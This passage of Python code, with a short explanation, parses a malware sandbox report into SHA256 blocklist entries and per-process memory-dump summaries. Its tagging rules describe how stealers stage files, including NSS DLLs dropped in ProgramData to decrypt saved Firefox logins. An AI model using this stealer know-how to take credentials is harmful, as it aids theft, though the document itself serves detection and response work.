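| MD5 | 5b423612b36cde7f2745455c5dd82577 |
| SHA256 | e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09 |
"""

MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
HASH_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9A-Fa-f]+)\s*\|$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
EMPTY_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"  # SHA256 of zero bytes
# Assumed analyst heuristic, not a label from the report: Mozilla NSS runtime DLLs dropped outside a
# Firefox install are what stealers load to decrypt saved Firefox logins (this report shows the first two).
NSS_DLLS = {"nss3.dll", "mozglue.dll", "freebl3.dll", "softokn3.dll"}

@dataclass
class MemoryRegion:
    pid: int
    start: int
    end: int
    @property
    def size(self) -> int:
        return self.end - self.start

@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)
    @property
    def is_empty(self) -> bool:  # zero-length content (here: the crashpad named pipe) has no IOC value
        return self.hashes.get("SHA256") == EMPTY_SHA256
    def hash_problems(self) -> list:  # algorithms whose digest length is wrong (truncated/garbled row)
        return [algo for algo, h in self.hashes.items() if len(h) != HASH_LEN[algo]]

def parse_listing(text: str):
    """Split the report into (dropped files, memory regions), keeping document order."""
    files, regions, current = [], [], None
    for line in filter(None, map(str.strip, text.splitlines())):
        if m := MEM_RE.match(line):
            regions.append(MemoryRegion(int(m[1]), int(m[3], 16), int(m[4], 16)))
        elif m := HASH_RE.match(line):
            if current is not None:  # a hash row always belongs to the path line above it
                current.hashes[m[1]] = m[2].lower()
        else:  # anything else is a path that opens a new dropped-file entry
            current = DroppedFile(path=line)
            files.append(current)
    return files, regions

def tag_path(f: DroppedFile) -> set:
    """Assumed triage tags derived only from where the sample wrote the file."""
    p = f.path.lower()
    rules = [
        (f.is_empty, "empty_or_pipe"),
        (p.endswith(".exe") and "\\pictures\\" in p, "exe_in_pictures"),
        (re.search(r"\\1000\d{6}\\", p) is not None, "numbered_staging_dir"),  # 10-digit dirs seen above
        (p.startswith("c:\\programdata\\") and p.rsplit("\\", 1)[-1] in NSS_DLLS, "nss_dll_in_programdata"),
    ]
    return {tag for hit, tag in rules if hit}

def summarize_memory(regions) -> dict:
    """Per PID: dump count, largest region, and how many dumps are single 4 KiB pages."""
    out = defaultdict(lambda: {"dumps": 0, "max_size": 0, "single_pages": 0})
    for r in regions:
        s = out[r.pid]
        s["dumps"] += 1
        s["max_size"] = max(s["max_size"], r.size)
        s["single_pages"] += int(r.size == 0x1000)
    return dict(out)

def ioc_rows(files) -> list:
    """(sha256, path, tags) for usable entries; first occurrence wins when a SHA256 repeats."""
    rows = {}
    for f in files:
        h = f.hashes.get("SHA256")
        if h and not f.is_empty and not f.hash_problems():
            rows.setdefault(h, (h, f.path, sorted(tag_path(f))))
    return list(rows.values())

if __name__ == "__main__":
    files, regions = parse_listing(SAMPLE)
    print(*ioc_rows(files), *sorted(summarize_memory(regions).items()), sep="\n")
```

Run it over the full listing rather than the embedded sample to get a blocklist-ready set of SHA256 values with their on-disk locations. The per-PID memory summary is the part worth reading alongside the hashes: in this report PID 4912's 0x400000-0x9CA000 range is captured repeatedly (indexes 78, 79, 80 and 202), an image-sized region of roughly 5.8 MB that is the usual shape of an unpacked payload being re-dumped, while the many 0x1000-byte entries are single pages and rarely carve into anything useful on their own.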